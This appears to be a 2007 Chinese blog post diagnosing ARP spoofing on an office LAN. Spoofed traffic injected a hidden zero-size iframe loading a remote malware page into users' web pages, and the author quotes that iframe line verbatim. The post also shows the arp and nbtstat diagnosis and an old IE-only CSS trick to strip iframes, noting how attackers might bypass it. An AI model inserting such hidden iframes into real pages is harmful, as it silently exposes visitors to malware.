最新分享 » 网页技术 » iframe注入与arp欺骗的问题

iframe注入与arp欺骗的问题

时间:2007-3-23 作者:天空下的雨 分类: 网页技术 评论:0 浏览:13367

"<iframe src=http://34.baieweee.com/5.html width=0 height=0 frameborder=0></iframe>"

本来以为这个帧病毒,是“微软鼠标指针漏洞”的原因,看来我是轻易下结论了,临下班的关机时间,给我带了错误的判断。写下了上一篇。http://birder.blueidea.com/archives/2007/4713.shtml

有强人说过,博客发表时要慎重,想好再发,但是既然发了就不能轻易删了。错误既然犯了,就留下做为警戒。以后发贴时,要验证清楚再按发送。

以下是修正:

因为局域网感染流行病毒,总是比外网慢一拍,等啊等啊,终于等到传说中的"ARP欺骗",得以一窥其芳容。

连入局域网的用户,不断反映内部网页打不开,在排除其它因素之后,用记事本打开网页,查看源代码。

发现在底部多了一行代码"<iframe src=http://34.baieweee.com/5.html width=0 height=0 frameborder=0></iframe>"以为是WEB服务器中招出了问题,在本地查看其源码,并没有发现异常代码。很是奇怪,和网上说的不一样啊?!

也就是说服务器并没有感染,这就好办了,只是客户机有问题。

中午休息时间,报故障的机器来电话说正常了,又可以打开网页了,可我什么都没动呀,看来是是那台攻击的机器午休了。

到了下午上班时间,果然,故障又出现了,和预想的一样。

直接调出CDM,输入

arp -a

172.16.90.21          00-02-3f-e8-a3-38     dynamic
172.16.90.104         00-02-3f-e8-a3-38     dynamic
172.16.90.251         00-02-b3-13-ef-36     dynamic

看出来没有?因为90.21是我们网关,90.104居然和网关的MAC地址一样,双胞胎啊,是典型的ARP欺骗。

找到源头地址就好办了,接下来用 nbtstat -A 172.16.90.104 查找到机器名,定位到某科室办公用机。

接下来事情,就是通知该机用户,做杀毒,恢复系统处理。

至此,本次的“ARP欺骗”告一段落。

 

<style type="text/css" media="all" id="tt">
/*<![CDATA[*/
iframe{
v:e­xpression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有 IFRAME */
}
#f126{v:e­xpression() !important} //如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="f126";
/*]]>*/
</style>

分析:
前缀:e­xpression(表达式);

  这个前缀是可以随意更换的,我上面取名为"v",例如我可以换成:abc123:e­xpression(this.src='about: blank',this.outerHTML=''); 挂木马的家伙得先看你的CSS里这个前缀,然后挂马的时候写成这样<iframe style="abc123:e­xpression() !important" src="URL"></iframe>,那个前缀一定要是和你的网站一样的(abc123),才能挂到马,哈哈哈!如果把前缀做成动态的,就非常OK了,看你怎么挂!